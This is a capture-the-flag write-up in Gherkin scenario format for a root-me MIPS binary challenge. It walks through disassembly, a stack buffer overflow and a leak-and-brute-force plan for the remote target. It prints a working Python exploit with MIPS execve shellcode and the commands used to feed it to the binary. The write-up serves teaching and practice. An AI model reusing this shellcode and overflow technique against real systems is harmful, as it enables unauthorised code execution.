## Version 2.0
## language: en

Feature: elf-x86-mips-no-nx
  Site:
    root-me
  Category:
    app-systeme
  User:
    m'baku
  Goal:
    Get shell and read the password

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04.5   |
    | gdb-pwndbg      | 1.1.0     |
    | gdb-multiarch   | 8.1.0     |
    | VMware          | 15.5.6    |
    | IDA             | 7.2       |
    | Xshell          | 6.0       |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its URL
    When I visit the link
    Then I see the environment configuration
    """
    PIE: disabled
    Relro: disabled
    NX: disabled
    ASLR: disabled
    SF: disable
    SSP: enable
    SRC: enabled
    """
    And an assembly code of the challenge is provided

  Scenario: Success: Analyzing the binary
    Given the source code is provided
    And it has a MIPS architecture [evidences](function.png)
    Then I decided to load the binary in IDA to have a better understanding
    Then reading the disassembly I notice 4 syscalls
    And unlike x86_64 that the number of syscalls is taken by $rax
    Then MIPS takes it in register $v0
    And its arguments in the $ax register, example:
    """
    addiu    $v0, syscall_number
    la       $a0, arg_0
    la       $a1, arg_1
    la       $a2, arg_2
    syscall
    """
    And looking for more information about syscalls
    Then I found a page that provides information about syscalls
    """
    https://git.linux-mips.org/cgit/ralf/linux.git/tree/
    arch/mips/include/uapi/asm/unistd.h
    """
    And now I can better understand disassembly
    Then the first thing the function does is to set the prologue, as in x86_64
    """"
    0x00400110 addiu   $sp, -0x18
    0x00400114 sw      $ra, 0x14($sp)
    """
    Then this means that the function will reserve 24 (0x18) bytes to the stack
    And where the offset 0x14 ($ra, 0x14($sp)) will be the return pointer ($ra)
    Then there are 4 syscalls (write, read, write, write) [evidences](sys.png)
    And there is an interesting syscall (sys_read)
    """
    0x00400134 li      $v0, 4003
    0x00400138 move    $a0, $zero
    0x0040013C move    $a1, $sp
    0x00400140 li      $a2, 0x80
    0x00400144 syscall 0
    """
    Then this routine would be the equivalent to this code in C
    """
    int main() {
        char stack[0x18]; // 24
        read(0, stack, 0x80); // 128
    }
    """
    And this routine contains a bug that allows the stack to overflow
    Then comes the epilogue that sets the stack frame of the above function
    """
    0x00400178 lw      $ra, 0x14($sp)
    0x0040017C addiu   $sp, 0x18
    0x00400180 jr      $ra
    0x00400184 nop
    """

  Scenario: Success: Exploiting the bug locally
    Given I identify a bug, A.K.A Stack Buffer Overflow
    Then the idea is to exploit it to get shell
    And since I know that the return is at offset 0x14
    And sys_read is read into the stack
    Then I would only have to write 20 bytes to reach the return
    And because the binary has neither NX nor ASLR [evidences](noaslr.png)
    Then I can overflow the buffer
    And make the return point to the beginning of my shellcode
    Then this is the exploit I wrote
    """
    import struct

    p32 = lambda x : struct.pack(">I", x)

    sp = 0x7ffffc80

    shellcode = ""
    shellcode += "\x28\x06\xff\xff"
    shellcode += "\x3c\x0f\x2f\x2f"
    shellcode += "\x35\xef\x62\x69"
    shellcode += "\xaf\xaf\xff\xf4"
    shellcode += "\x3c\x0e\x6e\x2f"
    shellcode += "\x35\xce\x73\x68"
    shellcode += "\xaf\xae\xff\xf8"
    shellcode += "\xaf\xa0\xff\xfc"
    shellcode += "\x27\xa4\xff\xf4"
    shellcode += "\x28\x05\xff\xff"
    shellcode += "\x24\x02\x0f\xab"
    shellcode += "\x01\x01\x01\x0c"

    print ('A' * 20 + p32(sp) + shellcode)
    """
    Then the binary gets the bytes from stdin I use cat to send it to it
    """
    $ python localexploit.py > payload
    $ (cat payload; cat) | ./binary
    """
    And this worked perfectly [evidences](localexploit.png) but
    Then I see a message on the server
    """"
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    !! ATTENTION: This is a REMOTE CHALLENGE on challenge03.root-me.org:56565 !
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    """
    Then this forces me to look for another attack approach
    And in which I cannot hardcode addresses

  Scenario: Success: Exploiting the bug remotely with ret2text
    Given it is a remote challenge
    Then I need to find a way to leak pointers from the stack
    And looking at the code for ways to get a leak
    Then I see a primitive that can help me with that
    """
    0x00400164 li      $v0, 4004
    0x00400168 li      $a0, 1
    0x0040016C move    $a1, $sp
    0x00400170 li      $a2, 0x14
    0x00400174 syscall 0
    """
    And I can use this routine to leak values from the stack
    Then the idea would be to overflow the buffer and return in 0x00400164
    Then see if there is any stack pointer [evidences](leakstack.png)
    And get the difference from the beginning of the shellcode
    Then I see the difference is 250 bytes from the shellcode
    """
    00000000: 4865 6c6c 6f20 576f 726c 640a 5768 6174  Hello World.What
    00000010: 2069 7320 796f 7572 206e 616d 653a 2000   is your name: .
    00000020: 4865 6c6c 6f20 0041 4141 4141 4141 4141  Hello .AAAAAAAAA
    00000030: 4141 4141 4141 4141 4141 410a 0000 017f  AAAAAAAAAAA.....
    00000040: fffe f500 0000 007f fffe fc7f ffff 1c71  ...............q
    00000050: 656d 753a 2075 6e63 6175 6768 7420 7461  emu: uncaught ta
    00000060: 7267 6574 2073 6967 6e61 6c20 3420 2849  rget signal 4 (I
    00000070: 6c6c 6567 616c 2069 6e73 7472 7563 7469  llegal instructi
    00000080: 6f6e 2920 2d20 636f 7265 2064 756d 7065  on) - core dumpe
    00000090: 640a 496c 6c65 6761 6c20 696e 7374 7275  d.Illegal instru
    000000a0: 6374 696f 6e0a                           ction.
    """
    And the leak is 0x7ffffef5 so the exact pointer of the shellcode is between
    """
    0x7ffffef5 - 250 < shellcode pointer < 0x7ffffef5 + 250
    """
    Then I bruteforce until I find the exact value
    And this is my exploit remotely: [evidences](vmelendez.py)
